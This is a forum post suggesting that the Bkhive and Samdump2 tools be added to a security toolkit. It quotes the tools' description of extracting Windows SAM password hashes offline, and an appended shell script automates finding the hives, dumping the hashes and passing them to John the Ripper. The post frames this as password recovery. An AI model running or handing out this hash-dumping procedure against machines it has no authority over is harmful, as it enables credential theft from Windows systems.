Topic: Bkhive and Samdump2

Tool name: BkHive & Samdump2

Tool Description:

"Syskey  is  a Windows feature that adds an additional encryption layer
to the password hashes stored in the SAM database. The main purpose of
this  feature  is  to  deter 'offline' attacks. In fact one of the most
common ways to gather passwords is to copy the system SAM database and
then  use  one  of the many good password crackers[1] to "recover" the
passwords; of course physical access is almost always required.

So  with syskey the attacker needs to remove the additional encryption
layer  to  get  the password hashes (this is not entirely true as some
tools can crack even syskeyed hashes while losing some performance).

The  key used by Syskey to encrypt the password hashes (called bootkey
or  system  key) can be generated and stored in three ways. The method
to use is selected when running syskey.exe on the host.

An attacker can steal (maybe at the same time of the SAM database) the
system  hive and access from there the above mentioned keys to recover
the syskey bootkey.

The tool developed to make this operation is called Bkhive.

So syskey encrypts the password hashes with the RC4 algorithm using as
key "something" derived (through MD5) from the syskey bootkey.

I've  developed  a  tool  to  automate the above steps and include the
features  of  SAMDUMP. The tool is called SAMDUMP2; SAMDUMP2 can, when
given  a  SAM  hive and a bootkey file (generated by Bkreg or Bkhive),
output the password hashes in SAMDUMP/PWDUMP format.

So an attacker with physical access can:

0)  Boot using another OS (maybe Linux or DOS)
1)  Steal the SAM and SYSTEM hive (from %WINDIR%\System32\config)
2)  Recover  the  syskey bootkey from the SYSTEM hive using Bkhive (or
    Bkreg on pre-SP4 systems)
3)  Dump the password hashes using SAMDUMP2
4)  Crack them offline using his favorite cracking tool"

Additional information: http://studenti.unina.it/~ncuomo/syskey/syskey.txt

Tool URL:
http://studenti.unina.it/~ncuomo/syskey/ (both located here)

Reasoning:
I think it is a good idea to include these tools because you then have the possibility to retrieve your Windows password if lost. The S-T-D already has 'chntpw', which can replace data in the SAM file, but there is a chance of losing data this way, and it would be much wiser just to get the actual password to get access to the system, rather than risking corrupting/destroying data. Right?

..And one little correction:
I noticed that on my S-T-D there are problems with the John password cracker. The *.chr files (all.chr, lanman.chr, etc.) don't exist, so the program cannot function properly. Maybe a new compilation should be considered for the next version of S-T-D, perhaps?

Thank you for listening and understanding.

- Sir Erugor

When the future is certain, you are dead
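The offline procedure in steps 0-4 of the quoted text, written out as a shell script to run from a Linux boot CD. This is an added example, not code from syskey.txt, from the Bkhive/Samdump2 author, or from the S-T-D project. It assumes the Windows partition is already mounted read-only at the given mount point, that bkhive and samdump2 are on the PATH, and that they take the arguments the quoted text describes (bkhive SYSTEMHIVE BOOTKEYFILE, then samdump2 SAMHIVE BOOTKEYFILE). The one thing the list of steps glosses over is that on a Linux mount the hive paths are case-sensitive and vary between installs (WINNT vs WINDOWS, SAM vs sam), so the script locates the hives case-insensitively instead of hard-coding the path.

```shell
#!/bin/sh
# Added example: steps 0-4 of the quoted syskey.txt procedure as a script.
# Not part of syskey.txt or S-T-D. Assumes (hypothetical setup) that the
# Windows partition is mounted READ-ONLY at the mount point passed in, e.g.
#   mount -o ro /dev/sda1 /mnt/win
# and that bkhive/samdump2 use the interface described in the quoted text.

# Step 1: locate the SAM and SYSTEM hives below the mount point.
# Linux mounts of NTFS/FAT are case-sensitive, and the directory and file
# names differ between installs (WINNT/WINDOWS, SAM/sam, SYSTEM/system),
# so match case-insensitively (GNU/busybox find -ipath).
# Prints "<sam-hive> <system-hive>" on success, returns 1 if either is missing.
find_hives() {
    mnt="$1"
    sam=$(find "$mnt" -maxdepth 4 -type f -ipath '*/system32/config/sam' | head -n 1)
    sys=$(find "$mnt" -maxdepth 4 -type f -ipath '*/system32/config/system' | head -n 1)
    [ -n "$sam" ] && [ -n "$sys" ] || return 1
    printf '%s %s\n' "$sam" "$sys"
}

# Steps 2-3: recover the bootkey from the SYSTEM hive with bkhive, then
# dump the password hashes from the SAM hive with samdump2 in pwdump format.
# Hives are only read, never written; output goes to $3 (and $3.bootkey).
dump_hashes() {
    sam="$1"; sys="$2"; out="$3"
    bootkey="${out}.bootkey"
    command -v bkhive >/dev/null 2>&1 || { echo "bkhive not found" >&2; return 1; }
    command -v samdump2 >/dev/null 2>&1 || { echo "samdump2 not found" >&2; return 1; }
    bkhive "$sys" "$bootkey" || return 1
    samdump2 "$sam" "$bootkey" > "$out"
}

# Usage: ./syskeydump.sh /mnt/win /tmp/hashes.txt
# Step 4 (cracking) is then e.g.:  john /tmp/hashes.txt
if [ "$#" -ge 2 ]; then
    set -- "$1" "$2" $(find_hives "$1") || exit 1
    # $1=mount point, $2=output file, $3=SAM hive, $4=SYSTEM hive
    dump_hashes "$3" "$4" "$2"
fi
```

The read-only mount is the point the poster's reasoning is after: unlike editing the SAM with chntpw, nothing on the Windows partition is modified, so there is no risk of corrupting the hives. Later samdump2 releases take the SYSTEM hive directly (without a separate bkhive step); if yours does, replace the two calls in dump_hashes accordingly.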